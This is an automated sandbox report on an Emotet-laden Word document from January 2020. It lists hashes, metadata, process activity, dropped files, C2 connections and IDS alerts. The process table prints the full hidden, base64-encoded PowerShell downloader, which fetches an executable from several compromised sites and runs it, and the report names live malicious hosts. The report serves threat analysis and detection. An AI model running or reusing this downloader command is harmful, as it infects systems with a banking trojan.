analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

OJ0768300870CT.doc

Full analysis: https://app.any.run/tasks/0c061031-d977-4506-9889-bc6e926622b5
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 18, 2020, 07:41:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Qui., Author: Benjamin Pierre, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 17 14:46:00 2020, Last Saved Time/Date: Fri Jan 17 14:46:00 2020, Number of Pages: 2, Number of Words: 4, Number of Characters: 29, Security: 0
MD5:

7AAE07E6C6AF5BB097CF5FB2D5FCAA08

SHA1:

1DFDD85A053E8C6BB4591255510D5F5C62F10D0D

SHA256:

C8E3C592764CC931CA345B5FFD3EE60B6EA84F0BE12BA50CE6F1C33E9335C4CA

SSDEEP:

6144:c0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+vpvFIwl:c0E3dxtR/iU9mvUPvLIwl

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 858.exe (PID: 1912)
      • 858.exe (PID: 2280)
      • serialfunc.exe (PID: 2764)
      • serialfunc.exe (PID: 2184)
    • Emotet process was detected

      • 858.exe (PID: 1912)
    • Connects to CnC server

      • serialfunc.exe (PID: 2184)
    • EMOTET was detected

      • serialfunc.exe (PID: 2184)
  • SUSPICIOUS

    • Creates files in the user directory

      • Powershell.exe (PID: 516)
    • Executed via WMI

      • Powershell.exe (PID: 516)
    • PowerShell script executed

      • Powershell.exe (PID: 516)
    • Executable content was dropped or overwritten

      • Powershell.exe (PID: 516)
      • 858.exe (PID: 1912)
    • Starts itself from another location

      • 858.exe (PID: 1912)
    • Connects to server without host name

      • serialfunc.exe (PID: 2184)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2388)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2388)
    • Reads settings of System Certificates

      • Powershell.exe (PID: 516)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

Title: Qui.
Subject: -
Author: Benjamin Pierre
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:01:17 14:46:00
ModifyDate: 2020:01:17 14:46:00
Pages: 2
Words: 4
Characters: 29
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 32
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 858.exe no specs #EMOTET 858.exe serialfunc.exe no specs #EMOTET serialfunc.exe

Process information

PID
CMD
Path
Indicators
Parent process
2388"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\OJ0768300870CT.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
516Powershell -w hidden -en JABEAGoAZgBwAHoAdQB4AGkAawBiAD0AJwBVAHUAZgBqAHgAdABoAGwAZwBoACcAOwAkAEUAcgBpAGsAYwBvAHEAeQBpACAAPQAgACcAOAA1ADgAJwA7ACQAWQB2AGUAcABsAGEAbABpAGoAbwBlAHkAPQAnAFkAYQBqAHIAYwBvAGYAbwBxAHcAZQB0AGUAJwA7ACQAVABzAG4AZABqAHcAdAB5AHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEUAcgBpAGsAYwBvAHEAeQBpACsAJwAuAGUAeABlACcAOwAkAEMAdwBuAG4AdgBiAHkAdABzAHoAYgA9ACcASwBmAGEAbABjAHgAaQBrAHgAJwA7ACQATwBpAGgAaABuAGsAYgBhAGcAYQBkAGwAbgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBFAHQALgBXAEUAYgBDAGwASQBFAE4AdAA7ACQAVABuAG0AdABuAGcAcABhAGoAeQA9ACcAaAB0AHQAcAA6AC8ALwBuAGUAaQBsAHcAaQBsAGwAaQBhAG0AcwBvAG4ALgBjAGEALwBiAGEAYwBrAHUAcAAvAGsAeABXAEgALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG4AZQB0AGsAYQBmAGUAbQAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AbQBhAGkAbgB0AC8AdABrAHUANwBhAHgALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHYAaQBiAGEAbQBhAHMAdABlAHIAYgBhAHQAYwBoAC4AYwBvAG0ALwBOAGUAdwBzAGwAZQB0AHQAZQByAC8AdQBhAHEAdABlAG0AeQAvACoAaAB0AHQAcABzADoALwAvAHAAaABvAGUAbgBpAHgAcwB0AG8AbgBlAGEAbgBkAGwAYQBtAGkAbgBhAHQAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFkANgA0AFUAbgBxADQAVAAwAC8AKgBoAHQAdABwAHMAOgAvAC8AdABlAHgAYwBsAHUAYgBiAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwAwAFYANABhAGoAeAAvACcALgAiAHMAcABgAEwAaQBUACIAKAAnACoAJwApADsAJABEAG8AawBmAGgAawByAHYAawB1AGgAcgA9ACcAWgB1AGEAaABxAHMAYgBqAGEAZAAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwBsAGcAZwBnAGQAYwB5ACAAaQBuACAAJABUAG4AbQB0AG4AZwBwAGEAagB5ACkAewB0AHIAeQB7ACQATwBpAGgAaABuAGsAYgBhAGcAYQBkAGwAbgAuACIARABgAE8AVwBgAE4ATABPAEEAZABGAGAASQBsAGUAIgAoACQAVwBsAGcAZwBnAGQAYwB5ACwAIAAkAFQAcwBuAGQAagB3AHQAeQByACkAOwAkAFQAcgBnAHMAZABmAGcAdABqAGcAcgBzAGwAPQAnAEYAdQBqAGQAbwBqAGEAZABkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAVABzAG4AZABqAHcAdAB5AHIAKQAuACIAbABFAGAATgBnAGAAVABIACIAIAAtAGcAZQAgADIANgAxADgANgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAYABBAHIAdAAiACgAJABUAHMAbgBkAGoAdwB0AHkAcgApADsAJABYAHMAdABuAGcAdgBsAHIAYQA9ACcAUgBiAGsAeABiAHMAZABoAHYAaQBsAHYAJwA7AGIAcgBlAGEAawA7ACQAQQB2AGwAdABuAGQAawBiAHgAagBiAD0AJwBLAHcAYQBxAGcAcgBjAHMAYgBkAG0AegAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAGcAeQBsAHcAZQB3AGcAYQB6AHkAbQBsAD0AJwBFAGEAdgBsAHkAcwBrAHYAcwBlAGUAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2280"C:\Users\admin\858.exe" C:\Users\admin\858.exePowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
1912--e90241f9C:\Users\admin\858.exe
858.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
2764"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe858.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
2184--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Version:
1, 0, 0, 76
Total events
2 283
Read events
1 451
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2388WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDF92.tmp.cvr
MD5:
SHA256:
2388WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF38F04F7795B23320.TMP
MD5:
SHA256:
516Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G0Q7SJG60F8D23EALI3Q.temp
MD5:
SHA256:
2388WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:92E4AE23EA4A277EC1EC2495E95A72F9
SHA256:73446FA4A66D1F8C23C7AD99A130123D293439E605FC6196A72079BC73951B5F
2388WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:9E33EB392A4DB11C2F9BC2DA20D6014E
SHA256:CE574AE7A7A8926FE79AE5E1A35CB2CAAC969490F3CEDB2DAA7534F05767E2F9
516Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
516Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF38eacd.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1912858.exeC:\Users\admin\AppData\Local\serialfunc\serialfunc.exeexecutable
MD5:4FD16D62FAD42708E88D437699EBB024
SHA256:B215D1B2601AE1C266990378320FA022B313EEE87AABB3F59B748A9C6EACE304
516Powershell.exeC:\Users\admin\858.exeexecutable
MD5:4FD16D62FAD42708E88D437699EBB024
SHA256:B215D1B2601AE1C266990378320FA022B313EEE87AABB3F59B748A9C6EACE304
2388WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$0768300870CT.docpgc
MD5:DC3E2766BC5C2579B34558C7DE18891C
SHA256:437BB328BBA073D11F8823E74732763292D35535856C593B672ED1A587ED4D7B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2184
serialfunc.exe
POST
100.6.23.40:80
http://100.6.23.40/1zhN3I
US
malicious
516
Powershell.exe
GET
500
208.91.198.220:80
http://neilwilliamson.ca/backup/kxWH/
US
html
7.14 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
516
Powershell.exe
208.91.198.220:80
neilwilliamson.ca
PDR
US
malicious
516
Powershell.exe
188.165.0.1:443
www.netkafem.org
OVH SAS
IE
unknown
2184
serialfunc.exe
100.6.23.40:80
MCI Communications Services, Inc. d/b/a Verizon Business
US
malicious

DNS requests

Domain
IP
Reputation
neilwilliamson.ca
  • 208.91.198.220
suspicious
www.netkafem.org
  • 188.165.0.1
unknown

Threats

PID
Process
Class
Message
2184
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
2184
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
2184
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
No debug info